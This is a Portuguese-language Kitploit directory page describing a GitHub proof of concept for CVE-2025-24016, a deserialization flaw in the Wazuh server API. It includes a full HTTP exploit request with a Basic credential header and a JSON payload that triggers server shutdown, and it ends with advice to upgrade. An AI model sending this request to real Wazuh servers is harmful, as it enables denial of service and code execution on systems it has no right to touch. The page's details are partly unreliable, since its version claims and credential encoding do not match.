Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE no servidor Wazuh! Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/glostarrx1/cve-2025-24016
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE no servidor Wazuh! Execução Remota de Código

Ver Repositório
16há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Execução Remota de Código (RCE) no Wazuh - PoC

Visão Geral da Vulnerabilidade

Este repositório demonstra a vulnerabilidade de execução remota de código (RCE) no servidor Wazuh, introduzida por uma desserialização insegura no pacote wazuh-manager. A vulnerabilidade permite que atacantes remotos com acesso à API (painel comprometido, servidores Wazuh no cluster ou determinadas configurações com agentes comprometidos) executem código arbitrário no servidor.

Versões Afetadas

  • wazuh-manager versão >= 4.4.0
  • Corrigida na versão >= 4.9.1

Descrição

A vulnerabilidade ocorre na API do Wazuh, onde os parâmetros do DistributedAPI são serializados como JSON e desserializados usando as_wazuh_object no arquivo framework/wazuh/core/cluster/common.py. Um atacante pode explorar essa vulnerabilidade injetando um dicionário não sanitizado em requisições DAPI, o que pode levar à avaliação de código Python arbitrário.

O RCE pode ser acionado usando o endpoint run_as, que permite ao atacante controlar o argumento auth_context. Ao criar uma requisição maliciosa, código arbitrário pode ser executado no servidor mestre.

Prova de Conceito

Para acionar essa vulnerabilidade usando a API do servidor, siga os passos abaixo.

Requisição PoC no Burp Suite

  1. Requisição no Burp Suite para Acionar a Vulnerabilidade:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Imagem da Solução

  1. Explicação da Requisição:
  • Cabeçalho Authorization: Esta é a autorização codificada em base64 (wazuh-wui:MyS3cr37P450r.*-).
  • Payload: O payload malicioso contém a exceção não sanitizada __unhandled_exc__, que aciona a execução de código Python arbitrário (exit neste caso).

Impacto

  • Execução Remota de Código (RCE): Esta vulnerabilidade permite que atacantes executem código arbitrário no servidor Wazuh, afetando as versões >= 4.4.0 até 4.9.0 (ainda não corrigida).
  • Potencial Negação de Serviço: Neste PoC, a função exit é acionada, fazendo com que o servidor Wazuh seja encerrado.

Mitigação

Para proteger seus sistemas, atualize para a versão >= 4.9.1 do Wazuh, onde este problema foi corrigido.

Baixar ferramenta